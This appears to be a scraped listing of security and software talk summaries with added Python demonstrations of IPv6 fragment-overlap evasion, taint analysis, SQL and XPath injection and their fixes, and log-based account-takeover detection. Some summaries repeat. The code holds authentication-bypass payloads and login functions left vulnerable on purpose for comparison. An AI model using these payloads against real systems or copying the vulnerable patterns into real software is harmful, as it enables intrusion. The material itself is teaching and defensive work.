The document discusses investing in security to secure investments. It describes the work of penetration testers, including scanning systems, finding vulnerabilities, exploiting vulnerabilities, and escalating privileges. The goal is to identify the most dangerous vulnerabilities and show real attacks an attacker could perform.
Attacking IPv6 Implementation Using Fragmentation (michelemanzotti)
This document provides an overview of attacking IPv6 implementations using fragmentation. It begins with background on fragmentation in IPv4 and IPv6. The presenter then examines fragmentation issues in popular OS implementations through examples. Target OSes include Ubuntu, FreeBSD, OpenBSD and Windows. Small fragments and overlapping fragments are demonstrated. The document discusses the security implications of these attacks, such as firewall evasion. It also covers different reassembly policies using the Paxson/Shankar model of fragmentation. The overall summary is that fragmentation can be used to bypass security controls by manipulating the packet payload across fragments.
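The following Python model is an added illustration and is not code from the presentation: it shows why overlapping fragments matter by reassembling the same two fragments under the "First" and "Last" policies of the Paxson/Shankar model and under the RFC 5722 rule that IPv6 nodes drop any datagram with overlapping fragments. The fragments are constructed for the demo, and offsets are given in bytes for readability (a real IPv6 Fragment header counts offsets in 8-octet units).

```python
from dataclasses import dataclass
from typing import List, Optional

# Offsets are in bytes here; a real IPv6 Fragment header carries them in
# 8-octet units, so multiply by 8 when reading values from a capture.
@dataclass(frozen=True)
class Fragment:
    offset: int
    data: bytes

# Constructed sample: fragment 1 carries the request a firewall is meant to see,
# fragment 2 arrives later and overlaps bytes 5..13 with a different path.
FRAGS: List[Fragment] = [
    Fragment(0, b"GET /good.html"),
    Fragment(5, b"evil.html"),
]

def reassemble(frags: List[Fragment], policy: str) -> Optional[bytes]:
    """Reassemble fragments (given in arrival order) under one overlap policy.

    "first"   keeps the byte that arrived first  (Paxson/Shankar 'First', e.g. Windows)
    "last"    keeps the byte that arrived last   (Paxson/Shankar 'Last', e.g. Cisco IOS)
    "rfc5722" discards the whole datagram on any overlap, as RFC 5722 requires for IPv6
    Returns None when the datagram is dropped or has a hole.
    """
    total = max(f.offset + len(f.data) for f in frags)
    buf = bytearray(total)
    seen = [False] * total
    for f in frags:
        for i, byte in enumerate(f.data):
            pos = f.offset + i
            if seen[pos]:
                if policy == "rfc5722":
                    return None          # overlap: drop the datagram
                if policy == "first":
                    continue             # keep the original byte
            buf[pos] = byte
            seen[pos] = True
    if not all(seen):
        return None                      # hole: reassembly would time out
    return bytes(buf)

def evasion_possible(frags: List[Fragment], firewall_policy: str, host_policy: str) -> bool:
    """True when the inspecting device and the target reassemble the same fragments
    into different payloads, i.e. the firewall inspected data the host never saw."""
    fw = reassemble(frags, firewall_policy)
    host = reassemble(frags, host_policy)
    return fw is not None and host is not None and fw != host

if __name__ == "__main__":
    for p in ("first", "last", "rfc5722"):
        print(p, reassemble(FRAGS, p))
    print("evasion first/last:", evasion_possible(FRAGS, "first", "last"))
```

The check a practitioner wants is the last one: a firewall that reassembles with the "first" policy in front of a host that reassembles with "last" inspects `/good.html` while the host executes `/evil.html`. Dropping overlaps outright, as RFC 5722 mandates, removes the ambiguity on both sides.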
Software testing is an investigation conducted to provide stakeholders with information about the quality of the product or service under test.
Software testing can also provide an objective, independent view of the software to allow the business to appreciate and understand the risks of software implementation.
Why is Software Testing Important to a business?
Software testing is a process to determine the quality of the software developed by a developer or programmer. It is a methodological study intended to evaluate the quality-related information of the product. Understanding of the important features and advantages of software testing helps businesses in their day-to-day activities.
Testing can be done in two ways, manual testing and automated testing. Manual software testing is done by human testers, who manually check the code and report bugs in it. In case of automated testing, testing is performed by a computer using software such as WinRunner, LoadRunner, etc.
This document discusses the importance of static analysis for secure programming. It describes how static analysis tools work by analyzing code without executing it to find security vulnerabilities based on predefined rules. Good tools prioritize results by risk and provide easy-to-understand interfaces for programmers to review issues. The document recommends adopting static analysis by running tools regularly during development, focusing on high priority issues, and measuring outcomes to improve security over time. Static analysis is presented as a way to bring security expertise to all programmers and make code reviews more efficient.
This document provides an introduction to reverse engineering and discusses cracking Windows applications. It begins with a disclaimer that reverse engineering copyrighted material is illegal. It then defines reverse engineering as analyzing a system to understand its structure and function in order to modify or reimplement parts of it. The document discusses reasons for learning reverse engineering like malware analysis, bug fixing, and customizations. It outlines some of the history of reverse engineering in software development. The remainder of the document focuses on tools and techniques for reverse engineering like PE identification, decompilers, disassemblers, debuggers, patching applications in OllyDbg, and analyzing key generation and phishing techniques.
S4 is a distributed stream computing platform that allows programmers to easily implement applications for processing continuous unbounded streams of data in real-time. It uses an actor-based programming model and is designed to be fault-tolerant, scalable, and pluggable. S4 was originally developed at Yahoo! Labs to enable personalized search ads by modeling users' click behaviors in real-time from streams of user activity data. It aims to maximize revenue and user experience by controlling ad ranking, pricing, filtering, and placement based on personalized models of users' intent.
Dr. Ronen Bar-Nahor - Optimizing Agile Testing in Complex Environments (AgileSparks)
The document discusses challenges in testing complex systems with legacy code and minimal automation. It recommends optimizing testing in agile by:
1) Breaking stories into testable chunks that can flow quickly to testing within sprints.
2) Involving QA early in architecture design to ensure testability.
3) Taking an incremental approach to automating tests for new features while refactoring legacy code.
4) Integrating continuously using a staged approach with independent integration testing.
Agile Software Development with Intrinsic Quality (Demetrius Nunes)
This is a little presentation to make absolutely clear why test automation and test driven development are key to any software development process that strives for high quality and high productivity.
[2010 CodeEngn Conference 04] passket - Taint analysis for vulnerability disc... (GangSeok Lee)
2010 CodeEngn Conference 04
In software development, vulnerabilities always exist. For hackers who devote everything to finding or exploiting vulnerabilities, a vulnerability is always "hiding" somewhere in the program, and many hackers have their own know-how for finding these hidden vulnerabilities. This talk discusses one of those many techniques: using Taint Analysis to trace which paths input data takes and how it is transformed inside the program. Going beyond the simple vulnerability-discovery techniques based on Mutation or Diffing, it explains the life cycle of input data, how transformed input data affects the program and induces a vulnerability, and techniques for detecting unknown zero-day attacks based on transformed data. It also explains how to build an efficient fuzzer using Taint Analysis.
http://codeengn.com/conference/04
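The static-analysis summary above describes tools that flag vulnerabilities from predefined rules without running the code, and this abstract describes tracing input data from where it enters to where it does damage. The following Python analyzer is an added example serving both items and is not code from either presentation: it walks a function's AST in source order, marks variables fed by assumed sources (`input`, `sys.argv`, ...), clears the mark when a value passes through an assumed sanitizer (`int`, `shlex.quote`, ...), and reports any assumed sink (`os.system`, `cursor.execute`, ...) that receives tainted data. The source, sink and sanitizer lists and the sample program are constructed for the demo; `ast.unparse` needs Python 3.9 or later.

```python
import ast
from typing import List, Set, Tuple

# Assumed rule set: where untrusted data enters, where it must not reach
# unchecked, and which calls neutralise it. A real tool ships a much larger list.
SOURCES = {"input", "sys.argv", "os.environ", "request.args.get", "request.form.get"}
SINKS = {"os.system", "os.popen", "subprocess.call", "subprocess.Popen", "eval", "exec"}
SINK_METHODS = {"execute", "executescript"}          # matched on any object, e.g. cursor.execute
SANITIZERS = {"int", "float", "shlex.quote", "html.escape"}

# Constructed sample program (parsed, never executed). Lines 5 and 10 are the bugs.
SAMPLE = """import os, shlex, subprocess
def handler(cursor):
    host = input("host: ")
    safe = shlex.quote(host)
    os.system("ping -c1 " + host)
    os.system("ping -c1 " + safe)
    count = int(input("count: "))
    subprocess.call(f"ping -c{count} 127.0.0.1", shell=True)
    query = "SELECT * FROM t WHERE name = '%s'" % host
    cursor.execute(query)
"""

def call_name(node: ast.Call) -> str:
    return ast.unparse(node.func)

def is_sink(name: str) -> bool:
    return name in SINKS or name.split(".")[-1] in SINK_METHODS

def tainted_expr(node: ast.AST, tainted: Set[str]) -> bool:
    """Is any untrusted value reachable from this expression?"""
    if isinstance(node, ast.Name):
        return node.id in tainted
    if isinstance(node, ast.Constant):
        return False
    if isinstance(node, ast.Attribute) and ast.unparse(node) in SOURCES:
        return True
    if isinstance(node, ast.Call):
        name = call_name(node)
        if name in SOURCES:
            return True
        if name in SANITIZERS:
            return False                       # taint stops at a sanitizer
        args = list(node.args) + [k.value for k in node.keywords]
        return any(tainted_expr(a, tainted) for a in args)
    # BinOp, f-strings (JoinedStr), Subscript, Tuple, ...: taint flows through any child
    return any(tainted_expr(c, tainted) for c in ast.iter_child_nodes(node))

def check_sinks(stmt: ast.AST, tainted: Set[str], findings: List[Tuple[int, str]]) -> None:
    for node in ast.walk(stmt):
        if isinstance(node, ast.Call) and is_sink(call_name(node)):
            if any(tainted_expr(a, tainted) for a in node.args):
                findings.append((node.lineno, call_name(node)))

def analyze(stmts, tainted: Set[str], findings: List[Tuple[int, str]]) -> None:
    """Flow-sensitive walk in source order; assignments propagate or clear taint."""
    for stmt in stmts:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef)):
            analyze(stmt.body, set(), findings)       # fresh scope per function
        elif isinstance(stmt, ast.Assign):
            check_sinks(stmt, tainted, findings)
            is_t = tainted_expr(stmt.value, tainted)
            for target in stmt.targets:
                for n in ast.walk(target):
                    if isinstance(n, ast.Name):
                        (tainted.add if is_t else tainted.discard)(n.id)
        elif hasattr(stmt, "body"):                   # if / for / while / with / try
            for field in ("body", "orelse", "finalbody"):
                analyze(getattr(stmt, field, []), tainted, findings)
        else:
            check_sinks(stmt, tainted, findings)

def find_taint_flows(source: str) -> List[Tuple[int, str]]:
    """Return (line, sink) pairs where untrusted data reaches a sink unsanitized."""
    findings: List[Tuple[int, str]] = []
    analyze(ast.parse(source).body, set(), findings)
    return sorted(findings)

if __name__ == "__main__":
    for line, sink in find_taint_flows(SAMPLE):
        print(f"line {line}: tainted data reaches {sink}")
```

On the sample it reports line 5 (`host` straight from `input()` into `os.system`) and line 10 (`query` built with `%` from `host` into `cursor.execute`), and stays silent on lines 6 and 8 because `shlex.quote` and `int` cleared the taint. Prioritising by sink severity and presenting the source-to-sink path is exactly the "easy-to-understand interface" the static-analysis summary asks for.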
This document discusses managing failures and building resilience into systems at Etsy. Some key points:
1. Etsy has a complex architecture with many services and data stores that are functionally partitioned. This architecture is designed to limit the impact of failures.
2. Failures cannot be prevented, but they can be mitigated through techniques like redundant systems, small code changes, feature flags, extensive metrics collection, and resilient user interfaces.
3. Rather than focusing only on 100% uptime, product design also considers availability during failures through approaches like non-blocking interfaces that adapt to technical issues.
4. Building resilience is a shared responsibility of operations, engineering, product, and design teams through
Creating, obfuscating and analyzing malware JavaScript (Krzysztof Kotowicz)
Malware attacks on unaware Internet users' browsers are becoming more and more common. New techniques for bypassing filters used by security vendors emerge. In turn, the filters are getting better, new analyzing tools are developed - the war continues. At the presentation you will learn how crackers are trying to hamper the work of security engineers, and how reversers are overcoming those problems. Emphasis will be placed on the weaknesses of automated tools - we'll try to avoid detection by jsunpack and Capture-HPC, we'll also trick Dean Edwards' Unpacker.
Here are 3 ways to prevent SQL injection:
1. Use prepared statements with parameter binding instead of concatenating strings.
2. Validate all input and sanitize special characters.
3. White-list allowed characters instead of blacklisting dangerous ones.
The root cause is putting untrusted data directly into a SQL query. Always separate data and code to prevent injection attacks.
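The three measures above, as an added example written for this page (not code from the original presentation), using Python's standard `sqlite3` module against a constructed in-memory table: the concatenating login check beside the parameterised one, plus an allow-list on the username as defence in depth. The payloads `' OR '1'='1` and `alice'--` are the classic authentication-bypass inputs.

```python
import re
import sqlite3

# Positive allow-list for usernames (assumed policy for the demo).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

def make_db() -> sqlite3.Connection:
    # Constructed sample database for the demonstration.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery')")
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Untrusted data is spliced into the query text: data becomes code.
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0

def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameter binding: the values travel separately from the statement, so
    # quotes and comment markers inside them can never change its structure.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0

def login_validated(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Defence in depth: reject anything outside the allow-list before it reaches SQL.
    if not USERNAME_RE.match(username):
        return False
    return login_safe(conn, username, password)

if __name__ == "__main__":
    db = make_db()
    for u, p in [("alice", "correct horse battery"), ("alice", "' OR '1'='1"), ("alice'--", "x")]:
        print(repr((u, p)), login_vulnerable(db, u, p), login_safe(db, u, p), login_validated(db, u, p))
```

Note that the `--` payload never touches the password at all: once the quote closes the username literal, the rest of the statement is a comment. No amount of password "sanitising" helps there, which is why binding parameters is listed first.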
Reading Group Presentation: The Power of Procrastination (Michael Rushanan)
This presentation exposes the current threat model of execution stalling malicious code, and multiple pointers to relevant academic research in analysis. I presented these works to a weekly Security and Privacy reading group.
The academic proceeding can be found here:
www.syssec-project.eu/media/page-media/3/hasten-ccs11.pdf
Michael Wilde, Splunk Ninja, gives an overview of Splunk, and discusses ways in which Splunk has solved some of its challenges using Amazon's EC2 / S3 Web Service to accomplish business goals
David Nuescheler: Igniting CQ 5.3: What's New and Roadmap (Day Software)
This document provides a roadmap and overview of CQ 5.3. It discusses improvements and new features in CQ 5.3 including easier use, more robustness, and 500 fixes and enhancements. It outlines stakeholder groups and introduces new tools like CRXDE Lite and the Package Share system. The document discusses future plans including investments in technologies like the cloud, JCR 2.0, and releases of CQ 5.4 and 5.5. It emphasizes that agility matters for business, authors, developers and infrastructure.
Kris Buytaert gave a talk on open source monitoring tools. He discussed how monitoring used to be an afterthought but new tools now focus on automation and integration. Popular modern tools like Prometheus focus on metrics collection and short-term storage while shipping long-term data to systems like Graphite. Prometheus excels at containerized environments through scraping but can also monitor other systems. Visualization and alerting have many options like Grafana, Icinga, and AlertManager. The landscape continues evolving towards full observability of applications and services.
Pipeline as code for your infrastructure as Code (Kris Buytaert)
This document discusses infrastructure as code (IAC) and continuous delivery pipelines. It introduces Puppet as an open-source configuration management tool for defining infrastructure as code. It emphasizes treating infrastructure configuration like code by versioning it, testing it, and promoting changes through environments like development, test, and production. The document also discusses using Jenkins for continuous integration to test application and infrastructure code changes and building automated pipelines for packaging and deploying changes.
Data Driven Security, from Gartner Security Summit 2012 (Nick Galbreath)
This document summarizes a presentation by Nick Galbreath on how Etsy uses Splunk to enable data-driven security. Some key points:
- Etsy uses Splunk to detect web application attacks like SQL injection and cross-site scripting by monitoring logs for malicious patterns.
- Splunk helps Etsy identify potential account takeovers from anomalous login activity like many failed passwords from one IP or high-volume password reset requests.
- Payment data in Splunk allows Etsy to monitor for fraud risks like abnormal payment amounts or velocities.
- Splunk supports Etsy's PCI compliance by enabling log searches and customized reports on sensitive systems.
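The account-takeover signals in the second bullet (many failed logins from one IP, bursts of password resets) reduce to the same detection: count matching events per source address inside a sliding time window. The following Python is an added example, not Etsy's or Splunk's code, that runs that logic over constructed key=value log lines; the thresholds and window lengths are assumptions to be tuned per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Callable, Dict, Iterable, List

# Constructed sample log lines in the key=value style a web tier would ship to an indexer.
# 203.0.113.5 sprays five different accounts in 30 s; 203.0.113.9 fires four resets in 25 s.
SAMPLE_LOG = """\
2012-06-12T10:00:01Z event=login result=fail user=alice ip=203.0.113.5
2012-06-12T10:00:04Z event=login result=fail user=bob ip=203.0.113.5
2012-06-12T10:00:09Z event=login result=fail user=carol ip=203.0.113.5
2012-06-12T10:00:15Z event=login result=fail user=dave ip=203.0.113.5
2012-06-12T10:00:22Z event=login result=fail user=erin ip=203.0.113.5
2012-06-12T10:00:30Z event=login result=ok user=frank ip=203.0.113.5
2012-06-12T10:01:00Z event=login result=fail user=alice ip=198.51.100.7
2012-06-12T10:01:30Z event=login result=ok user=alice ip=198.51.100.7
2012-06-12T10:02:00Z event=password_reset user=gina ip=203.0.113.9
2012-06-12T10:02:10Z event=password_reset user=hank ip=203.0.113.9
2012-06-12T10:02:20Z event=password_reset user=ivy ip=203.0.113.9
2012-06-12T10:02:25Z event=password_reset user=ivy ip=203.0.113.9
2012-06-12T10:40:00Z event=login result=fail user=bob ip=198.51.100.7
"""

KV = re.compile(r"(\w+)=(\S+)")

def parse(line: str) -> dict:
    """Split '<timestamp> k=v k=v ...' into a dict with a datetime under 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = dict(KV.findall(rest))
    fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return fields

def burst_sources(events: Iterable[dict], matches: Callable[[dict], bool],
                  threshold: int, window: timedelta) -> Dict[str, int]:
    """Return {ip: peak count} for every IP with >= threshold matching events
    inside any sliding window of the given length."""
    times: Dict[str, List[datetime]] = defaultdict(list)
    for e in events:
        if matches(e):
            times[e["ip"]].append(e["ts"])
    flagged: Dict[str, int] = {}
    for ip, ts in times.items():
        ts.sort()
        start, peak = 0, 0
        for end in range(len(ts)):
            while ts[end] - ts[start] > window:   # slide the window's left edge
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

def failed_login_bursts(lines: Iterable[str], threshold: int = 5,
                        window: timedelta = timedelta(minutes=5)) -> Dict[str, int]:
    events = [parse(l) for l in lines if l.strip()]
    return burst_sources(events, lambda e: e.get("event") == "login" and e.get("result") == "fail",
                         threshold, window)

def reset_bursts(lines: Iterable[str], threshold: int = 3,
                 window: timedelta = timedelta(minutes=10)) -> Dict[str, int]:
    events = [parse(l) for l in lines if l.strip()]
    return burst_sources(events, lambda e: e.get("event") == "password_reset", threshold, window)

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("failed-login bursts:", failed_login_bursts(lines))
    print("password-reset bursts:", reset_bursts(lines))
```

Keying on the source IP catches credential stuffing that spreads one or two attempts across many accounts, which a per-account lockout counter misses entirely; the same `burst_sources` helper keyed on `user` instead would catch brute force against a single account.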
This document discusses the concept of symbiotic security, where multiple security tools work together in an integrated ecosystem. It provides an example of how ThreadFix acts as a symbiotic tool by consolidating vulnerability data from different scanners and allowing that data to be used by other tools. The document argues that security tools should provide open APIs and data standards to encourage symbiotic functionality rather than working in isolated "silos". It also demonstrates how ThreadFix allows vulnerability data to be mapped with operational data and prioritized based on actual attacks.
ePOM - Fundamentals of Research Software Development - Integrated Development... (Giuseppe Masetti)
E-learning Python for Ocean Mapping (ePOM) project.
Complementary slides to the "Integrated Development Environment" module (part of the Fundamentals of Research Software Development training).
More details at https://www.hydroffice.org/epom
Operations is a Strategic Weapon (PuppetConf) (dev2ops)
Operations is a strategic weapon when companies continuously increase their velocity of innovation and improve their return on investment. When deployments can happen every few seconds and outages are rare, operations becomes a strategic advantage by allowing companies to scale, innovate quicker, and lower costs. This allows companies to win "innovation numbers games" against competitors.
NOSEC JSky is another product from NOSEC, the makers of Pangolin. It helps you test for the latest vulnerabilities in current Web technologies so that you can find security problems in your applications before attackers do. NOSEC JSky is a website security testing tool that automates vulnerability assessments. It supports all common Web application technologies, including ASP, ASP.NET, Java, PHP, JavaScript, Flash and Ajax. JSky is a fast scanner that covers the usual Web application vulnerability classes, including SQL injection and cross-site scripting, with WASC TC v2 and OWASP Top 10 compliance reporting. JSky lacks the intelligence required to scan the complexities of today's interactive Web 2.0 applications.
[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ... (CODE BLUE)
In this presentation, we will raise awareness of how Internet-facing SAP systems are particularly vulnerable to spyware, ransomware and worms due to their inherent complexity.
We will also introduce (for the first time in Asia) "Project ARSAP". This project is a semi-automatic mechanism whose main goal is to detect and register all SAP systems exposed to the Internet, extracting each system's metadata and cataloging the assets based on their geo-location, system type, version, installed components and potential risk of compromise.
We will present a brief introduction to SAP, defining its architecture and entry points, and explain in great detail the methodology behind the "ARSAP" project.
Then, three different scenarios where malware could strike SAP will be showcased. We will start by recreating a real SAP cyber-attack, where a company was attacked via malicious emails, and move on to other complex techniques that could allow anyone, directly from the Internet, to compromise the whole Internet-facing SAP system and jump to the adjacent network.
This presentation will include several live demos in which attendees can observe the entire attack workflow. We will conclude the presentation with suggested remediations and conclusions.
This document discusses threats to Android applications and existing techniques for protecting apps. It describes how apps can easily be cloned or modified by decompiling the APK, changing code or resources, and resigning it with a new signature. Standard techniques like obfuscation and licensing are ineffective against automated cracking tools. Strong integrity protection requires additional active measures beyond what is currently used.
The document provides a roadmap for CQ 5.3, highlighting key features and investments. It summarizes enhancements in usability, performance, and development tools. It also outlines the product release plan, with milestones for JCR, CMIS, HTTPbis, and future versions of CQ and CRX. The cloud is positioned as an agile alternative to on-premise hardware.
1) The document discusses XPath, an XML query language used to select nodes from an XML document. It provides examples of how XPath can be used to query nodes based on attributes, children, and other properties.
2) The document then discusses how XPath injection could allow an attacker to bypass authentication, bypass business logic, or extract arbitrary data from an XML database if user input is not sanitized in XPath queries.
3) Useful XPath functions like count, name, substring are demonstrated that could help an attacker crawl through and extract information from an XML structure. True/false-based blind XPath injection techniques are also presented.
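The authentication-bypass case in point 2 and its fix, as an added Python example that is not code from the presentation. XPath 1.0 has no escape character inside string literals, so a value containing both quote kinds cannot simply be quoted; `xpath_literal` below uses the standard `concat()` workaround, and the safe builder adds an allow-list on the username. The query shape `//user[name=... and password=...]` and the allow-list pattern are assumptions for the demo.

```python
import re

# Positive allow-list for usernames (assumed policy for the demo).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

def xpath_literal(value: str) -> str:
    """Encode value as an XPath 1.0 string literal.

    A literal is delimited by ' or " and cannot contain its own delimiter, so a
    value holding both quote kinds is assembled piecewise with concat()."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"

def query_vulnerable(username: str, password: str) -> str:
    # User input spliced straight into the predicate: quotes in it become syntax,
    # so password = "' or '1'='1" turns the predicate into a tautology.
    return f"//user[name='{username}' and password='{password}']"

def query_safe(username: str, password: str) -> str:
    # Allow-list first, then emit each value as a well-formed literal so it can
    # only ever be compared, never parsed.
    if not USERNAME_RE.match(username):
        raise ValueError("username outside allow-list")
    return f"//user[name={xpath_literal(username)} and password={xpath_literal(password)}]"

if __name__ == "__main__":
    bypass = "' or '1'='1"
    print(query_vulnerable("admin", bypass))
    print(query_safe("admin", bypass))
    print(xpath_literal('a\'b"c'))
```

Where the XPath engine offers variable binding (XPath 2.0 processors, or APIs such as Java's `XPathVariableResolver`), binding `$user` and `$pass` is the preferred equivalent of a SQL prepared statement; the literal encoder above is the fallback for XPath 1.0 libraries that do not.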
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp... (michelemanzotti)
This document summarizes three case studies of security assessments performed on VoIP environments. In Case Study 1, major weaknesses were identified in encryption and entity protection. Case Study 2 had weaknesses in access control, isolation, restriction, entity protection and secure management. Case Study 3 also identified issues with entity protection and secure management. The document discusses technical details found in each environment such as exposed services, outdated software and default credentials.
Similar to Lotus Domino: Penetration Through the Controller
1) The document discusses XPath, an XML query language used to select nodes from an XML document. It provides examples of how XPath can be used to query nodes based on attributes, children, and other properties.
2) The document then discusses how XPath injection could allow an attacker to bypass authentication, bypass business logic, or extract arbitrary data from an XML database if user input is not sanitized in XPath queries.
3) Useful XPath functions like count, name, substring are demonstrated that could help an attacker crawl through and extract information from an XML structure. True/false-based blind XPath injection techniques are also presented.
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...michelemanzotti
This document summarizes three case studies of security assessments performed on VoIP environments. In Case Study 1, major weaknesses were identified in encryption and entity protection. Case Study 2 had weaknesses in access control, isolation, restriction, entity protection and secure management. Case Study 3 also identified issues with entity protection and secure management. The document discusses technical details found in each environment such as exposed services, outdated software and default credentials.
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
The document discusses security vulnerabilities found in the web interfaces of security gateways. The author details how they used automated scanners, manual testing with Burp, and SSH access to root to find over 35 exploits in various security gateway products since 2011. Common vulnerabilities included input validation issues, predictable URLs and parameters enabling CSRF, excessive privileges, and session management flaws. The author provides examples of compromising ClearOS and Websense gateways, and demonstrates OSRF through Proofpoint's email system. They conclude many techniques are older but there remains a knowledge gap between secure web and UI development.
The document discusses TrueType fonts (.TTF) and their structure. It explains that a TrueType font file contains glyph outline data and hinting information in various tables. These include the EBDT, EBLC and EBSC tables which store embedded bitmap data, locations and scaling information. It also describes the glyf table which contains glyph outline instructions and details important aspects like the graphics state and instruction set for exploitation purposes.
Lotus Domino: Penetration Through the Controllermichelemanzotti
The document discusses penetration testing the Lotus Domino Server Controller. It describes 6 stages of an attack: 1) Searching for a target, 2) Choosing an exploit, 3) Researching the console protocol, 4) Exploiting the ZDI-11-110 vulnerability, 5) Using an exploit on SMB, and 6) Exploiting a 0day vulnerability. The purpose is to demonstrate how an attacker could gain control of the Domino server and the underlying operating system through vulnerabilities in the controller. It focuses on exploits for Lotus Domino 8.5.2 and 8.5.3 on Windows.
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?michelemanzotti
This document discusses cyber attacks against SAP systems. It notes that while many organizations focus on segregation of duties controls for SAP security, the underlying business infrastructure is also vulnerable. The number of reported vulnerabilities in SAP systems has risen dramatically in recent years. The document outlines some of the external and internal threats facing SAP implementations, and reports that penetration tests conducted by the author's company routinely found major security issues in over 95% of SAP systems evaluated, leaving them exposed to espionage and sabotage attacks.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
In the realm of cybersecurity, offensive security practices act as a critical shield. By simulating real-world attacks in a controlled environment, these techniques expose vulnerabilities before malicious actors can exploit them. This proactive approach allows manufacturers to identify and fix weaknesses, significantly enhancing system security.
This presentation delves into the development of a system designed to mimic Galileo's Open Service signal using software-defined radio (SDR) technology. We'll begin with a foundational overview of both Global Navigation Satellite Systems (GNSS) and the intricacies of digital signal processing.
The presentation culminates in a live demonstration. We'll showcase the manipulation of Galileo's Open Service pilot signal, simulating an attack on various software and hardware systems. This practical demonstration serves to highlight the potential consequences of unaddressed vulnerabilities, emphasizing the importance of offensive security practices in safeguarding critical infrastructure.
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/how-axelera-ai-uses-digital-compute-in-memory-to-deliver-fast-and-energy-efficient-computer-vision-a-presentation-from-axelera-ai/
Bram Verhoef, Head of Machine Learning at Axelera AI, presents the “How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-efficient Computer Vision” tutorial at the May 2024 Embedded Vision Summit.
As artificial intelligence inference transitions from cloud environments to edge locations, computer vision applications achieve heightened responsiveness, reliability and privacy. This migration, however, introduces the challenge of operating within the stringent confines of resource constraints typical at the edge, including small form factors, low energy budgets and diminished memory and computational capacities. Axelera AI addresses these challenges through an innovative approach of performing digital computations within memory itself. This technique facilitates the realization of high-performance, energy-efficient and cost-effective computer vision capabilities at the thin and thick edge, extending the frontier of what is achievable with current technologies.
In this presentation, Verhoef unveils his company’s pioneering chip technology and demonstrates its capacity to deliver exceptional frames-per-second performance across a range of standard computer vision networks typical of applications in security, surveillance and the industrial sector. This shows that advanced computer vision can be accessible and efficient, even at the very edge of our technological ecosystem.
Discover top-tier mobile app development services, offering innovative solutions for iOS and Android. Enhance your business with custom, user-friendly mobile applications.
Fueling AI with Great Data with Airbyte WebinarZilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfChart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Taking AI to the Next Level in Manufacturing.pdfssuserfac0301
Read Taking AI to the Next Level in Manufacturing to gain insights on AI adoption in the manufacturing industry, such as:
1. How quickly AI is being implemented in manufacturing.
2. Which barriers stand in the way of AI adoption.
3. How data quality and governance form the backbone of AI.
4. Organizational processes and structures that may inhibit effective AI adoption.
6. Ideas and approaches to help build your organization's AI strategy.
Main news related to the CCS TSI 2023 (2023/1695)Jakub Marek
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
What is an RPA CoE? Session 1 – CoE VisionDianaGray10
In the first session, we will review the organization's vision and how this has an impact on the COE Structure.
Topics covered:
• The role of a steering committee
• How do the organization’s priorities determine CoE Structure?
Speaker:
Chris Bolin, Senior Intelligent Automation Architect Anika Systems
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor IvaniukFwdays
At this talk we will discuss DDoS protection tools and best practices, discuss network architectures and what AWS has to offer. Also, we will look into one of the largest DDoS attacks on Ukrainian infrastructure that happened in February 2022. We'll see, what techniques helped to keep the web resources available for Ukrainians and how AWS improved DDoS protection for all customers based on Ukraine experience
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
